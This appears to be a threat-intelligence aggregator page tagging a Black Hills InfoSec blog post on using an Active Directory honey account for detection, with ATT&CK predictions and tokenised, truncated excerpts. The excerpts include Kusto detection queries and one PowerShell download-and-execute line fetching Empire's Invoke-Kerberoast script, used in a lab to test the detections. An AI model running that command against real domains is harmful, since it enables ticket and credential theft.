TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Black Hills InfoSec

One Active Directory Account Can Be Your Best Early Warning

BHIS · 2025-01-16 · Read original ↗

ATT&CK techniques detected

11 predictions
T1110.003Password Spraying
99%
"' status " > ' status " < " * | where status = = ' 0x0 ' | parse eventdata with * ' servicename " > ' servicename " < " * | where servicename! contains " $ " and servicename contains " ricardo " | parse eventdata with * ' ipaddress " > ' sourceip " < " * | project timegenerated, …"
T1558.003Kerberoasting
81%
". registered spn? badda bing, password hash. < powershell command block > iex ( new - object net. webclient ). downloadstring ( ' https : / / raw. githubusercontent. com / empireproject / empire / master / data / module _ source / credentials / invoke - kerberoast. ps1 ' ) ; invo…"
T1558.003Kerberoasting
71%
", account, ipaddress < / kusto query language > super easy detection here, and if you operate this account like you should, which is almost not all, this also produces a high - fidelity detection for malicious activity. after building an alert for the failed login query against e…"
T1558.003Kerberoasting
69%
"material does not describe that process, but alert rules were created to support claims made herein, during the creation of the content. next up, let ’ s add an spn to ricardo ’ s account. one command, easy peasy to make this account kerberoastable. if you are unaware, this is an…"
T1548.002Bypass User Account Control
59%
"the next screenshot, a valid login for our honey account contains the normalized account name, human readable, and easily searchable. with a bit more audit configuration, we can capture an additional event id for comparison. the following powershell will grab a copy of open threa…"
T1059.001PowerShell
50%
"##de6 - 11d0 - a285 - 00aa003049e2 - auditflags success < \ powershell command block > we can use powershell to validate the configuration of our audit rule. < powershell command block > $ acl = get - acl - path " ad : cn = ricardo. beneficio, ou = domainusers, dc = doazlab, dc =…"
T1558.004AS-REP Roasting
49%
". - conduct the kerberoasting attack. - password spray the ad users in the environment. and, with one last summary of the alerts, we should see all this activity. thanks for reading as always. reach out with questions about the content and material, we are pretty sure you all kno…"
T1558.003Kerberoasting
44%
". - conduct the kerberoasting attack. - password spray the ad users in the environment. and, with one last summary of the alerts, we should see all this activity. thanks for reading as always. reach out with questions about the content and material, we are pretty sure you all kno…"
T1558.004AS-REP Roasting
40%
", account, ipaddress < / kusto query language > super easy detection here, and if you operate this account like you should, which is almost not all, this also produces a high - fidelity detection for malicious activity. after building an alert for the failed login query against e…"
T1087.004Cloud Account
35%
"something like the screenshot below when your builder completes. if you ’ ve never seen azure, just search for your public ips. click on any of the objects to get an overview of the assigned ip and dns record. the ip and dns details for the blog environment are shown below. shoul…"
T1087.002Domain Account
35%
"something like the screenshot below when your builder completes. if you ’ ve never seen azure, just search for your public ips. click on any of the objects to get an overview of the assigned ip and dns record. the ip and dns details for the blog environment are shown below. shoul…"

Summary

Here we go again, discussing Active Directory, hacking, and detection engineering. tl;dr: One AD account can provide you with three detections that if implemented properly will catch common adversarial activities […]

The post One Active Directory Account Can Be Your Best Early Warning appeared first on Black Hills Information Security, Inc..